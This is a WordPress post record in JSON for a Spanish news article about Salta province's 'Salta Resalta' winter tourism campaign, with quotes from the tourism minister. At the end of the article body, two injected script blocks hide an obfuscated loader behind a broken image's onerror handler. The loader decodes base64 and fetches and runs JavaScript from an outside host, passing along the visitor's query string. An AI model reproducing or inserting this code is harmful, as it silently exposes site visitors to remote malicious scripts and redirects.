{"id":5259,"date":"2025-06-18T11:52:29","date_gmt":"2025-06-18T14:52:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5259"},"modified":"2025-08-13T23:29:51","modified_gmt":"2025-08-14T02:29:51","slug":"salta-resalta-la-campana-de-invierno-que-posiciona-a-la-provincia-como-un-destino-unico-y-multisensorial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5259","title":{"rendered":"Salta Resalta: la campa\u00f1a de invierno que posiciona a la provincia como un destino \u00fanico y multisensorial"},"content":{"rendered":"\n<p><strong><em>En C\u00f3rdoba, el Ministerio de Turismo realiz\u00f3 una acci\u00f3n experiencial que incluy\u00f3 degustaciones de vinos de altura y platos t\u00edpicos, espect\u00e1culos de danzas en vivo e intervenciones visuales con paisajes salte\u00f1os.<\/em><\/strong><\/p>\n\n\n\n<p>En el marco de una acci\u00f3n promocional en la ciudad de C\u00f3rdoba, el Ministerio de Turismo y Deportes de Salta present\u00f3 \u201cSalta Resalta\u201d, la nueva campa\u00f1a de comunicaci\u00f3n dise\u00f1ada para esta temporada de invierno. El objetivo es claro: destacar a Salta como un destino tur\u00edstico aut\u00e9ntico, diverso y con una identidad inconfundible.<\/p>\n\n\n\n<p>Durante el evento, se realiz\u00f3 una acci\u00f3n experiencial que incluy\u00f3 degustaciones de vinos de altura y platos t\u00edpicos, espect\u00e1culos de danzas en vivo e intervenciones visuales con paisajes salte\u00f1os, acercando al p\u00fablico cordob\u00e9s una muestra de lo que podr\u00e1n vivir durante sus vacaciones en la provincia.<\/p>\n\n\n\n<p>La campa\u00f1a propone un enfoque creativo, visual y emocional para posicionar los principales atributos de Salta: su naturaleza imponente, su gastronom\u00eda regional, su cultura viva, sus pueblos aut\u00e9nticos y la hospitalidad de su gente. A trav\u00e9s del concepto \u201cSalta Resalta\u201d, se busca transmitir c\u00f3mo la provincia resalta y se destaca dentro del mapa tur\u00edstico nacional e internacional.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17926-salta-resalta-la-campania-de-invierno-que-posiciona-a-la-provincia-como-un-destino-unico-y-multisensorial.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17926-salta-resalta-la-campania-de-invierno-que-posiciona-a-la-provincia-como-un-destino-unico-y-multisensorial.webp\" alt=\"Salta Resalta: la campa\u00f1a de invierno que posiciona a la provincia como un destino \u00fanico y multisensorial.\"\/><\/a><\/figure>\n\n\n\n<p>La ministra de Turismo y Deportes,&nbsp;<strong>Manuela Arancibia<\/strong>, expres\u00f3: \u201cC\u00f3rdoba es uno de nuestros mercados emisores m\u00e1s importantes. Los cordobeses no solo nos eligen, sino que vuelven. Y eso habla del v\u00ednculo emocional que construimos como destino. Con esta campa\u00f1a queremos invitar a redescubrir Salta, vivir sus paisajes, su cultura, su gente. Y hacerlo con una agenda de m\u00e1s de 1.000 actividades para estas vacaciones.\u201d<\/p>\n\n\n\n<p>La acci\u00f3n forma parte de una estrategia de promoci\u00f3n nacional que incluye medios tradicionales, plataformas digitales, ferias, prensa especializada y acciones presenciales en puntos clave del pa\u00eds. Este a\u00f1o, Salta proyecta recibir a m\u00e1s de 300.000 visitantes durante el receso invernal, consolidando su posici\u00f3n como uno de los destinos m\u00e1s elegidos del norte argentino.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En C\u00f3rdoba, el Ministerio de Turismo realiz\u00f3 una acci\u00f3n experiencial que incluy\u00f3 degustaciones de vinos de altura y platos t\u00edpicos, espect\u00e1culos de danzas en vivo e intervenciones visuales con paisajes salte\u00f1os. En el marco de una acci\u00f3n promocional en la ciudad de C\u00f3rdoba, el Ministerio de Turismo y Deportes de Salta present\u00f3 \u201cSalta Resalta\u201d, la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5260,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,18],"tags":[],"class_list":{"0":"post-5259","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5259"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5259"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5259\/revisions"}],"predecessor-version":[{"id":6461,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5259\/revisions\/6461"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5260"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5259"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5259"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}